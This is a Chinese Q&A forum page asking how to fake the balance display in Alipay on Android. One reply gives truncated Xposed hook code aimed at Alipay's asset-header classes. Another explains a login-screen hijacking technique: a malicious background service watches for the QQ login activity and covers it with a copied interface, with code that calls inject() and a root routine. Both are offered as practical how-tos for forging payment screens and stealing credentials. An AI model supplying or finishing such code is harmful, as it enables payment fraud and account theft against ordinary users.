安卓手机的支付宝app如何伪造修改余额显示?
类似于网页f12的开发者工具修改dom值。
网友回复
还有一种就是xposed,示例代码:
public class AlipayHook implements IXposedHookLoadPackage { @Override public void handleLoadPackage(XC_LoadPackage.LoadPackageParam lpparam) throws Throwable { if (lpparam.packageName.equals("com.eg.android.AlipayGphone")) { XposedBridge.log("load alipay"); ClassLoader classLoader = lpparam.classLoader; Class<?> aClass = classLoader.loadClass("com.alipay.android.render.engine.viewbiz.AssetsHeaderV2View"); Class<?> aClass2 = classLoader.loadClass("com.alipay.android.render.engine.model.AssetsCardModel"); if (aClass != null) ...
点击查看剩余70%
两种方式,一种是界面劫持
一、 界面劫持原理
恶意应用会利用后台服务,持续检测当前手机界面是否为目标应用(例如QQ登录界面)。一旦检测到目标界面,就会立即显示高仿的ui界面遮盖qq登录界面,实现劫持。
二、 代码示例
1. 后台服务检测
以下代码展示了恶意应用如何利用后台服务检测目标界面:
new Thread(new Runnable() { @Override public void run() { Looper.prepare(); while (true) { ActivityManager am = (ActivityManager) getSystemService(Context.ACTIVITY_SERVICE); List<RunningTaskInfo> tasks = am.getRunningTasks(1); if (tasks.get(0).topActivity.getClassName().equals("com.tencent.mobileqq.activity.LoginActivity")) { inject(); RunAsRooter(); break; } try { Thread.sleep(500); ...
点击查看剩余70%